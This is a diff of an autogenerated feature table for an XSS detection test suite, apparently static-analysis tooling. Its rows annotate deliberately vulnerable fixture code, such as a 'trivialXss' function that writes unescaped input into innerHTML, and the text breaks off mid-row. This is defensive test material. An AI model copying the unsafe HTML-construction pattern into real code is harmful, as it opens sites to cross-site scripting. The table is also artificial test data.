autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:17:1:26 | trivialXss | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:17:1:26 | trivialXss | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:17:1:26 | trivialXss | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:28:1:28 | s | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:28:1:28 | s | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:28:1:28 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:28:1:28 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:28:1:28 | s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:28:1:28 | s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:28:1:28 | s | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:28:1:28 | s | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:28:1:28 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:1:28:1:28 | s | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:14 | html | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:14 | html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:14 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:14 | html | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:14 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:41 | html | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:41 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:41 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:41 | html | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:41 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:41 | html = ... /span>" | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:41 | html = ... /span>" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:41 | html = ... /span>" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:41 | html = ... /span>" | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:11:2:41 | html = ... /span>" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:25 | "" | contextFunctionInterfaces | trivialXss(s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:25 | "" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:25 | "" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:25 | "" | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:25 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:25 | "" | stringConcatenatedWith | -endpoint- s + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:29 | "" + s | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:29 | "" + s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:29 | "" + s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:29 | "" + s | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:29 | "" + s | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:41 | " ... /span>" | contextFunctionInterfaces | trivialXss(s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:41 | " ... /span>" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:18:2:41 | " ... /span>" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | @@ -22760,6 +150463,41 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:33:2:41 | "" | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:33:2:41 | "" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:2:33:2:41 | "" | stringConcatenatedWith | '' + s -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:12 | document | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:12 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:12 | document | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:12 | document | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:12 | document | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:26 | documen ... elector | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:26 | documen ... elector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:26 | documen ... elector | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:26 | documen ... elector | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:26 | documen ... elector | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:35 | documen ... #html") | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:35 | documen ... #html") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:35 | documen ... #html") | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:35 | documen ... #html") | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:35 | documen ... #html") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:35 | exceptional return of documen ... #html") | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:35 | exceptional return of documen ... #html") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:35 | exceptional return of documen ... #html") | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:35 | exceptional return of documen ... #html") | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:35 | exceptional return of documen ... #html") | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:45 | documen ... nerHTML | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:45 | documen ... nerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:45 | documen ... nerHTML | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:45 | documen ... nerHTML | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:45 | documen ... nerHTML | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:52 | documen ... = html | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:52 | documen ... = html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:52 | documen ... = html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:52 | documen ... = html | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:5:3:52 | documen ... = html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:14:3:26 | querySelector | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:14:3:26 | querySelector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:14:3:26 | querySelector | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:14:3:26 | querySelector | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:14:3:26 | querySelector | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:28:3:34 | "#html" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:28:3:34 | "#html" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:28:3:34 | "#html" | contextFunctionInterfaces | trivialXss(s) | @@ -22768,18 +150506,119 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:28:3:34 | "#html" | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:28:3:34 | "#html" | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:28:3:34 | "#html" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:37:3:45 | innerHTML | contextFunctionInterfaces | trivialXss(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:37:3:45 | innerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:37:3:45 | innerHTML | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:37:3:45 | innerHTML | enclosingFunctionName | trivialXss | +| autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:37:3:45 | innerHTML | fileImports | | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:49:3:52 | html | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:49:3:52 | html | contextFunctionInterfaces | trivialXss(s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:49:3:52 | html | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:49:3:52 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:49:3:52 | html | enclosingFunctionName | trivialXss | | autogenerated/Xss/UnsafeHtmlConstruction/lib/src/MyNode.ts:3:49:3:52 | html | fileImports | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:0 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:0 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | createHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | createHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | markdown | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | markdown | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | myMermaid | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | myMermaid | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | myMermaid | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | require | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | require | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | striptags | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | striptags | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:1 | striptags | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:41 | module. ... ruction | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:41 | module. ... ruction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:1:41 | module. ... ruction | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:4:1 | module. ... html;\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:4:1 | module. ... html;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:1:4:1 | module. ... html;\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:8:1:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:8:1:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:8:1:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:16:1:41 | xssThro ... ruction | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:16:1:41 | xssThro ... ruction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:16:1:41 | xssThro ... ruction | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:1:44 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:1:44 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:1:44 | this | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:1:44 | this | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:1:44 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | 'arguments' object of anonymous function | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | 'arguments' object of anonymous function | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | exceptional return of anonymous function | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | exceptional return of anonymous function | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | functio ... html;\\n} | assignedToPropName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | functio ... html;\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | functio ... html;\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | return of anonymous function | contextFunctionInterfaces | 